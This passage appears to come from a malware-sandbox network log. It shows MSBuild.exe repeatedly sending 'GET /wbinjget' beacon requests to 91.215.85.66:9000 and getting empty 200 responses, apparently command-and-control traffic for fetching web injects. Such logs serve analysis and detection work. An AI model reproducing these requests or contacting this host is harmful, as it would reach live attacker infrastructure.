Apr 27, 2024 00:47:28.328480959 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:28 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49810	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:28.650444031 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:28.855920076 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:28 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49811	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:29.173064947 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:29.393507957 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:29 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49812	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:29.707252979 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:29.917587042 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:29 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49813	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:30.701368093 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:30.909548044 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:30 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49814	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:31.993236065 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:32.196103096 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:31 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49815	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:32.540633917 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:32.756165028 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:32 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49816	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:33.083677053 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:33.292119980 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:32 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49817	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:33.611150980 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:33.821703911 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:33 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49818	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:34.131189108 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:34.348845959 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:33 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49819	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:34.686486959 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:34.902988911 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:34 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49820	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:35.241472006 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:35.446821928 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:34 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49821	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:35.765238047 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:35.974834919 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:35 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49822	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:36.286257982 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:37.044254065 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:36 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49823	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:37.358409882 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:37.565713882 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:36 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.4	49824	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:37.886194944 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:38.092406034 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:37 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.4	49825	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:38.418804884 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:38.632955074 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:37 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.4	49826	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:38.953938007 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:39.162662983 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:39 GMT
Apr 27, 2024 00:47:39.668489933 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:39 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	49827	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:39.480206966 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:39.689431906 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:39 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	49828	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:39.997884989 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:40.201287031 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:40 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	49829	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:40.516407967 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:40.728738070 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:40 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	49830	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:41.041771889 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:41.257205009 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:41 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.4	49831	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:41.568196058 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:41.774636030 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:41 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	49832	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:42.094314098 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:42.301809072 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:42 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	49833	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:45.625610113 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:45.834678888 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:45 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	49834	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:46.157325029 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:46.359072924 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:46 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
81	192.168.2.4	49835	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:46.681396008 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:46.888094902 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:46 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.4	49836	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:47.211201906 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:47.418842077 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.4	49837	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:47.743001938 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:47.956970930 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:47 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.4	49838	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:48.274219990 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:48.478699923 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:48 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.4	49839	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:49.819905996 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:50.032507896 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:49 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.4	49840	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:50.352353096 CEST	86	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000
Apr 27, 2024 00:47:50.558784962 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:50 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.4	49841	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:50.882528067 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:51.086961031 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:50 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.4	49842	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:51.421663046 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:51.623544931 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.4	49843	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:51.941327095 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
Apr 27, 2024 00:47:52.168971062 CEST	316	IN	HTTP/1.1 200 OK Content-Length: 0 Server: Microsoft-HTTPAPI/2.0 Access-Control-Allow-Origin: * Access-Control-Allow-Methods: OPTIONS, HEAD, GET, PUT, POST, DELETE Access-Control-Allow-Headers: * Accept: / Accept-Language: en-US, en Accept-Charset: ISO-8859-1, utf-8 Date: Fri, 26 Apr 2024 22:47:51 GMT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.4	49844	91.215.85.66	9000	8056	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
Apr 27, 2024 00:47:52.501379967 CEST	110	OUT	GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1 Host: 91.215.85.66:9000 Connection: Keep-Alive
